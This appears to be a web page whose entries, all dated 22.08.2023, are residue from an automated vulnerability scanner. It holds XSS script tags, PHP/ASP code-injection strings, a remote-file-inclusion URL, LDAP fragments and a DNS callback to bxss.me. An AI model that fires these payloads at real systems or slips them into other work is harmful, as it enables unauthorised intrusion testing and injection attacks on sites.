20'"()&%<acx><ScRiPt >8YNC(9382)</ScRiPt>
22.08.2023 21:36
'.gethostbyname(lc('hitfr'.'bnrpjrwz8d2b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(71).chr(98).chr(84).'
22.08.2023 21:36
'"()&%<acx><ScRiPt >8YNC(9485)</ScRiPt>
22.08.2023 21:36
http://bxss.me/t/fit.txt?.jpg
22.08.2023 21:36
";print(md5(31337));$a="
22.08.2023 21:36
bxss.me
22.08.2023 21:36
${@print(md5(31337))}
22.08.2023 21:36
${@print(md5(31337))}\
22.08.2023 21:36
'.print(md5(31337)).'
22.08.2023 21:36
)
22.08.2023 21:36
!(()&&!|*|*|
22.08.2023 21:36
^(#$!@#$)(()))******
22.08.2023 21:36
'"()
22.08.2023 21:36
"+response.write(9871630*9475650)+"
22.08.2023 21:36
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
22.08.2023 21:36
1some_inexistent_file_with_long_name.jpg